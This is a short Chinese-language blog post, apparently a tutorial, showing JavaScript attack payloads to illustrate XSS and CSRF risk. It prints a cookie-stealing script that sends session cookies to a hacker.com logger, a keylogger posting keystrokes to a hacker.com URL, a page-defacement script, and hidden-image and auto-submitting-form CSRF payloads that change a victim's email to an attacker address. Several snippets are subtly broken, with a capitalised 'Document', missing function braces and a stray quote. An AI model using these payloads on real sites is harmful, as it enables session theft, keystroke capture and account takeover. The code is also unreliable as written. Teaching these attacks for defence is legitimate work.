JavaScript 惡意程式範例

JavaScript 惡意程式範例

這篇文章主要介紹三個JavaScript 惡意程式範例,

說明為什麼XSS是網站風險的第一名。

Cookie stealing

竊取Cookie 可以得知使用者許多使用習慣,甚至是登入的驗證 token

[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]

<script language="Javascript">
         Document.location='http://www.hacker.com/cookieLogger.php?cookie='+document.cookie;
</script>

[/pastacode]

Key Logger

鍵盤側錄。將使用者鍵盤輸入傳送到惡意網站。

[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]

<script>
       document.onkeypress = function(e)
       var img = new Image();
       img.src='http://www.Hacker.com/keylogger.php?data='+e.which;
</script>

[/pastacode]

Website defacing

將網頁改寫。最常見的就是 “xxxx到此一遊”

[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]

<script>
      document.body.innerHTML="<div style=visibility:visible;>

                  <h1>THIS WEBSITE IS UNDER ATTACK</h1>

       </div>";
</script>

[/pastacode]

 

 

CSRF 攻擊

如果網站用Http GET 傳送資訊,可以透過下列方式,誘導使用者傳送。

[pastacode lang=”javascript” message=”” highlight=”” provider=”manual”]

<img src=http://vulnerableapp.com/userinfo/edit.php?email=evil@attacker.com height="1" width="1"/>

[/pastacode]

如果網站用Http Post 傳送資訊

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

<iframe style=visibility:"hidden" name="csrf-frame"></iframe>
       <form name="csrf" action=""http://vulnerableapp/userinfo/edit.php" method="POST" target="csrf-frame">
                 <input type="hidden" name="email" value="evil@attacker.com">
                 <input type='submit' value='submit'>
        </form>
<script>document.csrf.submit();</script>

[/pastacode]

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *